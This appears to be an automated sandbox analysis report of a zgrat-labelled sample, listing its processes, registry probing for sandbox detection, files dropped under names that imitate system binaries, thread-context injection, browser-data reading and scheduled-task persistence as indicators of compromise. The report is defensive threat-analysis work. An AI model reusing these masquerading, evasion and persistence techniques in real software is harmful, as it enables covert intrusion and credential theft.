zgrat | 71cf21d4e30ae98454b96a451083590210af75bf547df729f178c261a263ff1e

System Information Discovery

Processes:

HyperSpoof.exeHpsrSpoof.exesphyperRuntimedhcpSvc.execonhostsft.exe.sphyperRuntimedhcpSvc.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2177723727-746291240-1644359950-1000\Control Panel\International\Geo\Nation	HyperSpoof.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2177723727-746291240-1644359950-1000\Control Panel\International\Geo\Nation	HpsrSpoof.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2177723727-746291240-1644359950-1000\Control Panel\International\Geo\Nation	sphyperRuntimedhcpSvc.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2177723727-746291240-1644359950-1000\Control Panel\International\Geo\Nation	conhostsft.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2177723727-746291240-1644359950-1000\Control Panel\International\Geo\Nation	.sphyperRuntimedhcpSvc.exe

Executes dropped EXE 64 IoCs

Processes:

HpsrSpoof.exesphyperRuntimedhcpSvc.execonhostsft.exeVolumeid64.exeDevManView.exeDevManView.exeDevManView.exe.conhostsft.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exe.sphyperRuntimedhcpSvc.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exeAMIDEWINx64.exeAMIDEWINx64.exeAMIDEWINx64.exeAMIDEWINx64.exeAMIDEWINx64.exeAMIDEWINx64.exeAMIDEWINx64.exeAMIDEWINx64.exeAMIDEWINx64.exeAMIDEWINx64.exeAMIDEWINx64.exeAMIDEWINx64.exeAMIDEWINx64.exeAMIDEWINx64.exeAMIDEWINx64.exeAMIDEWINx64.exeAMIDEWINx64.exeAMIDEWINx64.exeAMIDEWINx64.exeAMIDEWINx64.exeAMIDEWINx64.exeAMIDEWINx64.exeAMIDEWINx64.exeAMIDEWINx64.exeAMIDEWINx64.exeAMIDEWINx64.exeAMIDEWINx64.exeAMIDEWINx64.exeAMIDEWINx64.exeAMIDEWINx64.exeVolumeid64.exedllhost.exeVolumeid64.exeVolumeid64.exeVC_redist.x64.exeVolumeid64.exeVolumeid64.exeVolumeid64.exeVolumeid64.exeVolumeid64.exeVolumeid64.exeVolumeid64.exeVolumeid64.exe

pid	process
5036	HpsrSpoof.exe
880	sphyperRuntimedhcpSvc.exe
4736	conhostsft.exe
2532	Volumeid64.exe
4304	DevManView.exe
3668	DevManView.exe
2304	DevManView.exe
1468	.conhostsft.exe
1928	DevManView.exe
1844	DevManView.exe
3656	DevManView.exe
4992	DevManView.exe
3396	DevManView.exe
2952	DevManView.exe
3532	DevManView.exe
3988	.sphyperRuntimedhcpSvc.exe
4524	DevManView.exe
4536	DevManView.exe
4312	DevManView.exe
2980	DevManView.exe
2232	DevManView.exe
4700	AMIDEWINx64.exe
1392	AMIDEWINx64.exe
4548	AMIDEWINx64.exe
3668	AMIDEWINx64.exe
4992	AMIDEWINx64.exe
4600	AMIDEWINx64.exe
2192	AMIDEWINx64.exe
2536	AMIDEWINx64.exe
2580	AMIDEWINx64.exe
2208	AMIDEWINx64.exe
5380	AMIDEWINx64.exe
672	AMIDEWINx64.exe
5168	AMIDEWINx64.exe
1744	AMIDEWINx64.exe
4124	AMIDEWINx64.exe
4504	AMIDEWINx64.exe
1528	AMIDEWINx64.exe
4868	AMIDEWINx64.exe
2768	AMIDEWINx64.exe
4788	AMIDEWINx64.exe
4224	AMIDEWINx64.exe
1532	AMIDEWINx64.exe
2260	AMIDEWINx64.exe
4504	AMIDEWINx64.exe
3952	AMIDEWINx64.exe
5388	AMIDEWINx64.exe
2228	AMIDEWINx64.exe
5792	AMIDEWINx64.exe
3536	AMIDEWINx64.exe
5568	AMIDEWINx64.exe
4412	Volumeid64.exe
5660	dllhost.exe
4288	Volumeid64.exe
4736	Volumeid64.exe
6112	VC_redist.x64.exe
2952	Volumeid64.exe
5920	Volumeid64.exe
5812	Volumeid64.exe
3272	Volumeid64.exe
3292	Volumeid64.exe
1956	Volumeid64.exe
428	Volumeid64.exe
5216	Volumeid64.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Enumerates connected drives 3 TTPs 30 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

Peripheral Device Discovery

System Information Discovery

Processes:

DevManView.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exeDevManView.exe

description	ioc	process
File opened (read-only)	\??\F:	DevManView.exe
File opened (read-only)	\??\D:	DevManView.exe
File opened (read-only)	\??\D:	DevManView.exe
File opened (read-only)	\??\F:	DevManView.exe
File opened (read-only)	\??\F:	DevManView.exe
File opened (read-only)	\??\F:	DevManView.exe
File opened (read-only)	\??\F:	DevManView.exe
File opened (read-only)	\??\D:	DevManView.exe
File opened (read-only)	\??\F:	DevManView.exe
File opened (read-only)	\??\F:	DevManView.exe
File opened (read-only)	\??\F:	DevManView.exe
File opened (read-only)	\??\F:	DevManView.exe
File opened (read-only)	\??\F:	DevManView.exe
File opened (read-only)	\??\D:	DevManView.exe
File opened (read-only)	\??\D:	DevManView.exe
File opened (read-only)	\??\F:	DevManView.exe
File opened (read-only)	\??\D:	DevManView.exe
File opened (read-only)	\??\D:	DevManView.exe
File opened (read-only)	\??\F:	DevManView.exe
File opened (read-only)	\??\F:	DevManView.exe
File opened (read-only)	\??\D:	DevManView.exe
File opened (read-only)	\??\D:	DevManView.exe
File opened (read-only)	\??\F:	DevManView.exe
File opened (read-only)	\??\D:	DevManView.exe
File opened (read-only)	\??\D:	DevManView.exe
File opened (read-only)	\??\D:	DevManView.exe
File opened (read-only)	\??\D:	DevManView.exe
File opened (read-only)	\??\D:	DevManView.exe
File opened (read-only)	\??\D:	DevManView.exe
File opened (read-only)	\??\F:	DevManView.exe

Maps connected drives based on registry 3 TTPs 64 IoCs

Disk information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

System Information Discovery

Processes:

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0	DevManView.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count	DevManView.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\NextInstance = "0"	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum	DevManView.exe
Delete value	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0	DevManView.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count = "0"	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0	DevManView.exe

Drops file in System32 directory 4 IoCs

Processes:

.conhostsft.exepowershell.exeVC_redist.x64.exe

description	ioc	process
File opened for modification	C:\Windows\system32\MRT.exe	.conhostsft.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\system32\MRT.exe	VC_redist.x64.exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

VC_redist.x64.exe

description pid process target process

PID 6112 set thread context of 224 6112 VC_redist.x64.exe conhost.exe

description	pid	process	target process
PID 6112 set thread context of 224	6112	VC_redist.x64.exe	conhost.exe

Drops file in Program Files directory 6 IoCs

Processes:

.sphyperRuntimedhcpSvc.exe

description	ioc	process
File created	C:\Program Files\Windows Sidebar\Shared Gadgets\backgroundTaskHost.exe	.sphyperRuntimedhcpSvc.exe
File created	C:\Program Files\Windows Sidebar\Shared Gadgets\eddb19405b7ce1	.sphyperRuntimedhcpSvc.exe
File created	C:\Program Files\Microsoft Office\Updates\Apply\TextInputHost.exe	.sphyperRuntimedhcpSvc.exe
File created	C:\Program Files\Microsoft Office\Updates\Apply\22eafd247d37c3	.sphyperRuntimedhcpSvc.exe
File created	C:\Program Files (x86)\MSBuild\Microsoft\csrss.exe	.sphyperRuntimedhcpSvc.exe
File created	C:\Program Files (x86)\MSBuild\Microsoft\886983d96e3d3e	.sphyperRuntimedhcpSvc.exe

Drops file in Windows directory 2 IoCs

Processes:

DevManView.exeDevManView.exe

description	ioc	process
File opened for modification	C:\Windows\INF\setupapi.dev.log	DevManView.exe
File opened for modification	C:\Windows\INF\setupapi.dev.log	DevManView.exe

Launches sc.exe 14 IoCs

Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid	process
4896	sc.exe
5332	sc.exe
3600	sc.exe
5604	sc.exe
2120	sc.exe
5264	sc.exe
5464	sc.exe
5504	sc.exe
5228	sc.exe
4484	sc.exe
5600	sc.exe
5652	sc.exe
2084	sc.exe
1380	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks SCSI registry key(s) 3 TTPs 64 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

System Information Discovery

Processes:

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Mfg	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0066\	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\00000066\00000000	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Driver	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\00000065\00000000	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0067	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0065	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Mfg	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\DeviceDesc	DevManView.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Device Parameters	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Mfg	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0064	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0066	DevManView.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0064\	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Capabilities	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0065\	DevManView.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\ConfigFlags	DevManView.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\00000067\00000000	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Control	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\00000066\00000000	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\00000067\00000000	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ContainerID	DevManView.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\00000067\00000000	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Driver	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Capabilities	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0064\	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0065	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ClassGUID	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\LocationInformation	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\00000065\00000000	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0067\	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Service	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Control	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\00000064\00000000	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\DeviceDesc	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\00000067\00000000	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Driver	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\ContainerID	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0066\	DevManView.exe
Delete value	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Mfg	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Driver	DevManView.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002	DevManView.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Mfg	DevManView.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Control	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Control	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0066	DevManView.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Device Parameters	DevManView.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0067	DevManView.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK	DevManView.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\00000065\00000000	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0064	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM	DevManView.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters	DevManView.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0003	DevManView.exe

Creates scheduled task(s) 1 TTPs 15 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid	process
3220	schtasks.exe
4664	schtasks.exe
4088	schtasks.exe
3516	schtasks.exe
512	schtasks.exe
1532	schtasks.exe
2260	schtasks.exe
4536	schtasks.exe
448	schtasks.exe
944	schtasks.exe
3940	schtasks.exe
5044	schtasks.exe
4064	schtasks.exe
4940	schtasks.exe
